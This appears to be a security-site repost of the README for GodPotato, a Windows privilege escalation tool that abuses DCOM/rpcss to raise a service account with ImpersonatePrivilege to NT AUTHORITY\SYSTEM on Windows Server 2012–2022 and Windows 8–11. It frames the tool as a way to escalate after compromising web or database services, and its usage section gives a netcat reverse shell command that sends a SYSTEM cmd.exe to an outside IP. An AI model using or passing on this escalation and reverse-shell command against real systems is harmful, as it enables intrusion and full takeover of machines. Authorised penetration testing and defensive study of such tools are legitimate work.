GodPotato – Local Privilege Escalation Tool From A Windows Service Accounts To NT AUTHORITY\SYSTEM
Based on the history of Potato privilege escalation for 6 years, from the beginning of RottenPotato to the end of JuicyPotatoNG, I discovered a new technology by researching DCOM, which enables privilege escalation in Windows 2012 – Windows 2022, now as long as you have “ImpersonatePrivilege” permission. Then you are “NT AUTHORITY\SYSTEM”, usually WEB services and database services have “ImpersonatePrivilege” permissions.
Potato privilege escalation is usually used when we obtain WEB/database privileges. We can elevate a service user with low privileges to “NT AUTHORITY\SYSTEM” privileges. However, the historical Potato has no way to run on the latest Windows system. When I was researching DCOM, I found a new method that can perform privilege escalation. There are some defects in rpcss when dealing with oxid, and rpcss is a service that must be opened by the system. , so it can run on almost any Windows OS, I named it GodPotato
Affected version
Windows Server 2012 – Windows Server 2022 Windows8 – Windows 11
Example
GodPotato -cmd "cmd /c whoami"
Customize Clsid and execute commands
Execute reverse shell commands
GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"
Thanks
zcgonvh
skay
A considerable amount of time and effort goes into maintaining this website, creating backend automation and creating new features and content for you to make actionable intelligence decisions. Everyone that supports the site helps enable new functionality.
If you like the site, please support us on “Patreon” or “Buy Me A Coffee” using the buttons below
To keep up to date follow us on the below channels.
